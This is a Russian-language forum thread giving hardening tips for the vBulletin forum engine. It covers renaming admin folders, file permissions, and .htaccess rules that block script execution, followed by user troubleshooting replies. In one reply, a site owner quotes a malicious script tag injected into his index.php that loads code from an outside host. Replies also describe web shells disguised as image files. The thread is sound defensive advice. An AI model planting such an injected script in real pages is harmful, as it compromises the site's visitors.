Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > vBulletin 3.х > Инструкции по vBulletin
Расширенный поиск

Инструкции по vBulletin Всевозможные мануалы, FAQ и инструкции по vBulletin

Ответ
 
Опции темы Поиск в этой теме
Старый 28.01.2010, 00:05 Вверх   #1
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Восклицание Рекомендации по защите движка форума vBulletin

Рекомендации по защите движка форума vBulletin

В интернете есть различная информация по защите скрипта. Что тут можно сказать, хоть и говорят что скрипт обладает высокой защищенностью, но турки это опровергают. Не буду скрывать, наш форум так взламывали аж 2 раза и каким то макаром умудрились залить шел. Ну да бог с ним ... )


Итак, начну по порядку:
1. Что нужно сделать после установки скрипта - это удалить папку install из файловой системы форума (так же имеет смысл удалить файл validator.php и checksum.md5 - если они есть в корневой папке), переименовать папку панели администратора (admincp) и папку панели модератора (modcp) в произвольные имена, которые не забыть вписать в файл includes/config.php вот в этом месте:

Код:
    //    ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
    //    This setting allows you to change the name of the folders that the admin and
    //    moderator control panels reside in. You may wish to do this for security purposes.
    //    Please note that if you change the name of the directory here, you will still need
    //    to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
Не забываем в config.php указать в строчке undeletable user свой ID, чтобы Ваш профиль нельзя было удалить и изменить.

Выставляем права на папки и файлы:
папки форума: 755
файлы: 644
на файлы: .htaccess - 444

2. Устанавливаем на свою учетную запись "ядренный пароль", который трудно будет взломать перебором. Так же рекомендуется устанавливать сложный пароль на базу данных, иногда взлом производят непосредственно через нее следующим образом. У примеру Вы хоститесь у компании альфа и используете виртуальный хостинг, для взлома злоумышленник покупает хостинг у той же компании что и Ваша и начинает вызнавать имя Вашей базы (т.к. обычно юзеры используют общий мускул в котором хранятся все базы) и естественно зная логин и пароль к ней можно ее слить или просто стереть все данные.

3. Заменяем папку панели администратора (admincp) на ложную админку (Fake AdminCP), это позволит всем любознательным варварам пытающимся попасть в панель админа "утереть нос". А вообще для полной надежности я бы порекомендовал установить на папку с ложной админкой и настоящей админкой пароль через файл .htpasswd. (Для тех кто не в курсе что это такое возможно выложу инструкцию при наличии времени, но могу точно сказать что в интернете по данной теме Вы найдете массу информации). Это может ввести в заблуждение человека который подумает что дополнительный пароль стоит скорее всего на настоящей админке, а если он его и взломает, то все равно останется с носом.

Если Вы имеете постоянный IP адрес в интернете, то имеет смысл установить на админку запрет входа в админку для всех IP кроме Вашего, делается это простым закидыванием в папку с админкой файла .htaccess с содержимым:

Код:
Order Deny,Allow
Deny from all
Allow from 192.168.1.1
Где 192.168.1.1 - это Ваш IP.

4.
В целях безопасности имеет смысл хранить все аватары, вложения и изображения в базе данных, чтобы на них нельзя было давать прямых ссылок и нельзя было залить шел в папки с картинками. Но это может существенно повлиять на производительность системы если вес базы будет очень большой.

Если Вы всё таки решите хранить файллы в директории форума, то на нее нужно будет выставить права 0777, а для защиты этой директории залейте туда файл .htaccess с содержимым:

Код:
RemoveHandler .phtml
RemoveHandler .php
RemoveHandler .php3
RemoveHandler .php4
RemoveHandler .php5
RemoveHandler .cgi
RemoveHandler .exe
RemoveHandler .pl
RemoveHandler .asp
RemoveHandler .aspx
RemoveHandler .shtml

<Files ~ "\.php|\.phtml|\.cgi|\.exe|\.pl|\.asp|\.aspx|\.sht ml">
Order allow,deny
Deny from all
</Files>
.

Если нужно, то можно добавить свои расширения файлов, которые будут запрещены к выполнению в данной папке.

5. Закрываем доступ в папку includes путем заливки туда файла .htaccess с содержимым:

Код:
order allow, deny
deny from all
.

6. Установите плагин Инспектор файлов с помощью которого Вы сможете отслеживать изменения в файловой системе форума.

7. Защищаем форум от брута аккаунтов, делается это довольно просто. Устанавливаем хак Advanced Login System v.1.0, который после ввода данных аккаунта перенаправляет на страницу ввода капчи. Таким макаром брут аккаунтов существенно усложняется.

8. Так же стоит подумать о запрете листинга каталогов (листинг - это просмотр в браузере содержимого папок форума). Если листинг на форуме разрешен, то злоумышленник без проблем сможет увидеть названия папок вашей админки (это не самое страшное). Для того чтобы запретить листинг во всех каталогах форума нужно в корневом файле .htaccess прописать директиву:

Options -Indexes

Сохраняем изменения.

9. [Не обязательно!!!] Еще одной мерой защиты является переименование конфигурационного файла config.php и изменение его местоположения. Это затруднит злоумышленникам поиск информации о подключении к базе данных. Смотрим инструкцию Как переименовать конфигурационный файл config.php

Это пока все, если кто-то найдет дополнительные материалы по защите vBulletin отписывайтесь в теме.


Статья собрана из материалов взятых на различных сайтах, но в основном на vbsupport.org и nulled.ws.
При перепечатывании материалов статьи ссылка на данную тему обязательна.

Последний раз редактировалось Serberg; 16.03.2012 в 18:04.. Причина: обновлено
  Ответить с цитированием
Старый 19.12.2012, 13:32 Вверх   #101
Коренной житель
 
Аватар для RussianSpace
RussianSpace вне форума
Доп. информация
По умолчанию

Цитата Сообщение от weka Посмотреть сообщение
возможно через фтп его не видно , посмотри через панель управления например
Тоже нету
  Ответить с цитированием
Старый 19.12.2012, 14:42 Вверх   #102
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от RussianSpace Посмотреть сообщение
Спасибо большое, форум заклеил изнутри полностью, осталось раскрутить его)
и ещё, у меня нету в корневой директории файла .htaccess
Ну и правильно. Изначально его там и не было.
  Ответить с цитированием
Старый 20.12.2012, 10:36 Вверх   #103
Коренной житель
 
Аватар для RussianSpace
RussianSpace вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
Ну и правильно. Изначально его там и не было.
То есть создавать его самому и загружать? Создал, загрузил, сайт перестал работать)
  Ответить с цитированием
Старый 20.12.2012, 12:31 Вверх   #104
Знаток
 
Аватар для Inferno
Inferno вне форума
Доп. информация
По умолчанию

Цитата Сообщение от RussianSpace Посмотреть сообщение
Создал, загрузил, сайт перестал работать)
http://www.bormotuhi.net/showthread.php?t=1977
  Ответить с цитированием
Старый 03.01.2013, 16:28 Вверх   #105
Местный житель
 
Аватар для soleg
soleg вне форума
Доп. информация
По умолчанию

плиз перезалейте инстектор файлов

http://www.bormotuhi.net/showpost.ph...&postcount=105
  Ответить с цитированием
Старый 04.02.2013, 11:31 Вверх   #106
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

Ребят, такой вопрос: в последнее время, очень часто, начали в файлы index.php и регистрации внедрять такой код:
PHP код:
<script type="text/javascript" charset="windows-1251" src="http://house.404.mn/locker.php?id=dWO"></script> 
Права на файлы стоят 755
Как закрыться?
Инспектор хоть и предупреждает, но не всегда могу вовремя среагировать.
  Ответить с цитированием
Старый 04.02.2013, 11:32 Вверх   #107
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

Упс, права не те походу
  Ответить с цитированием
Старый 04.02.2013, 12:33 Вверх   #108
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Vandal Посмотреть сообщение
Права на файлы стоят 755
На файлы 644
  Ответить с цитированием
Cказали cпасибо:
Старый 04.02.2013, 14:59 Вверх   #109
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

C файлами понятно, но на папках 755 и вот, нашел "нахлебников"
  Ответить с цитированием
Старый 04.02.2013, 15:14 Вверх   #110
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Vandal, во-первых, стоит уязвимая версия "простых страниц" - бегом фиксить
после этого принудительно сменить пароли всему админско-модерскому составу
проверить на наличие "левых" модулей, особенно на аяксе и на факе
искать шелла - он точно есть
  Ответить с цитированием
Cказали cпасибо:
Старый 10.02.2013, 20:40 Вверх   #111
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
искать шелла - он точно есть
Нашел в 4х файлах: в одном прописали и 3 файла замаскировали под существующие картинки, но в разрешении .php
Всё почистил, латки поставил. Антивиры уже не ругаются.
Спасибо за подсказки, в поиске очень помог ai-bolit.php
  Ответить с цитированием
Старый 12.02.2013, 21:52 Вверх   #112
Опытный пользователь
 
Аватар для BMW M6
BMW M6 вне форума
Доп. информация
По умолчанию

А какое максимальное кол-во символов в пароле админа?
  Ответить с цитированием
Старый 14.02.2013, 08:58 Вверх   #113
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

Цитата Сообщение от BMW M6 Посмотреть сообщение
А какое максимальное кол-во символов в пароле админа?
Прошу прощения, что отвечаю вопросом, но на каком количестве символов Вам было отказано в таком пароле?
  Ответить с цитированием
Старый 14.02.2013, 12:03 Вверх   #114
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Цитата Сообщение от BMW M6 Посмотреть сообщение
А какое максимальное кол-во символов в пароле админа?
интересный вопрос...

Цитата Сообщение от Vandal Посмотреть сообщение
но на каком количестве символов Вам было отказано в таком пароле?
ещё более интересный вопрос...))

===
насколько мне известно, в языковом пакете нет фразы о слишком длинном пароле

кроме того, надо понимать, как вообще работает сохранение пароля в вобле

1. нет никакой разницы, чей это пароль, админский, модерский или юзерский

2. при регистрации или смене пароля движок производит некоторые манипуляции с введенным паролем - заворачивает его в мд5, добавляет соль и снова заворачивает в мд5
в результате этих манипуляций получается 32-х символьный хеш, который и записывается в поле password в таблице user

таким образом, не имеет значения, был пароль 111 или первая глава "Войны и мира" - в таблицу запишется 32 символа хеша, не больше
  Ответить с цитированием
4 пользователя(ей) сказали cпасибо:
Старый 15.02.2013, 11:36 Вверх   #115
Уважаемая личность
 
Аватар для Vandal
Vandal вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
ещё более интересный вопрос...))
Я к тому, что проще было бы попробовать забить желаемый пароль
  Ответить с цитированием
Старый 10.03.2013, 23:37 Вверх   #116
Новичок
 
Аватар для prostoya11
prostoya11 вне форума
Доп. информация
По умолчанию

Поставил Advanced_login_system(Капча при входе) Наверное кодировкой ошибся,теперь я никак не могу зайти на форум,даже в админ панель,чтобы выключить.Подскажите пожалуйста,что делать?
  Ответить с цитированием
Старый 11.03.2013, 00:43 Вверх   #117
Старший модератор
 
Аватар для Prometej
Prometej вне форума
Доп. информация
По умолчанию

Уже не один раз писали что хаки отключаются через файл config.php.
  Ответить с цитированием
Старый 17.12.2013, 16:21 Вверх   #118
Пользователь
 
Аватар для viliksari
viliksari вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
которые не забыть вписать в файл includes/config.php вот в этом месте:


$config['Misc']['admincpdir'] = 'admincp';
Это обязательно делать? Какой смысл тогда прятать админку?
А как же это? -
Если переименовать админку и не указать путь в конфигурации, то будет гораздо сложнее её найти и следовательно применить XSS или еще что похуже.

Последний раз редактировалось viliksari; 17.12.2013 в 16:25..
  Ответить с цитированием
Старый 17.12.2013, 19:43 Вверх   #119
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от viliksari Посмотреть сообщение
Если переименовать админку и не указать путь в конфигурации, то будет гораздо сложнее её найти и следовательно применить XSS или еще что похуже.
Если в конфиге ее не укажешь - то тупо ссылка работать в админку не будет с главной страницы форума и все.

Цитата Сообщение от viliksari Посмотреть сообщение
Это обязательно делать? Какой смысл тогда прятать админку?
Ну тогда оставь как есть. Разрабы глупость придумали с переименование админки.
  Ответить с цитированием
Cказали cпасибо:
Старый 17.12.2013, 22:25 Вверх   #120
Пользователь
 
Аватар для viliksari
viliksari вне форума
Доп. информация
По умолчанию

Есть минусы: — редактирование профиля и добавление модераторов перестанут работать без ручной правки ссылок.
Как понять редактирование профиля и доб модеров, без ручной правки?
  Ответить с цитированием
Ответ

Метки
vbulletin, антихак, защита

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как убрать powered by vbulletin в Title форума Serberg Инструкции по vBulletin 45 10.02.2019 01:15
Чем чревато использование пиратского движка vbulletin? Merianae vBulletin 4.x 88 24.10.2013 00:47
Обновление версий движка vBulletin orange0507 vBulletin 3.х 4 14.04.2011 15:57
Сдаю в оренду место для форума vBulletin wolf blan Доска объявлений 2 05.03.2011 15:55
Как разместить PHP код в шаблонах форума vBulletin ? Virus_f vBulletin 3.х 7 01.02.2010 18:10


Текущее время: 23:10. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.20143 секунды с 12 запросами